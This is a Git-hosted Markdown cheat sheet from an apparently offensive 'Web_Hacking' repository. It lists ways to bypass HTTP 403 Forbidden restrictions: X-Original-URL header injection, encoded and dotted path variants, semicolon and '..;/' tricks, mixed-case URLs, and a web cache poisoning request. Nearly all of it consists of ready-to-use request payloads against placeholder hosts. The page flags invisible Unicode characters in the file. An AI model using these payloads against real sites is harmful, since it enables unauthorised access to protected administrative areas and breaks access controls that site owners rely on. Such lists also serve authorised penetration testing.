vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
Web_Hacking/403 Bypass.md
Mehdi fb9bf3e71f
Update
2023-09-15 16:18:51 +03:30

67 lines
1.1 KiB
Markdown
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Bypass 403 (Forbidden)
### Using `X-Original-URL` header
```bash
# Normal Request (403)
GET /admin HTTP/1.1
Host: target.com
# Try this to bypass (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
### Appending `%2e` after the first slash
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/%2e/admin
```
### Try add dot `.` slash `/` and semicolon `;` in the URL
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret
```
### Add `..;/` after the directory name
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/admin..;/
```
### Try to uppercase the alphabet in the url
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/aDmIN
```
## Via Web Cache Poisoning
```bash
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin
```
Reference in New Issue View Git Blame Copy Permalink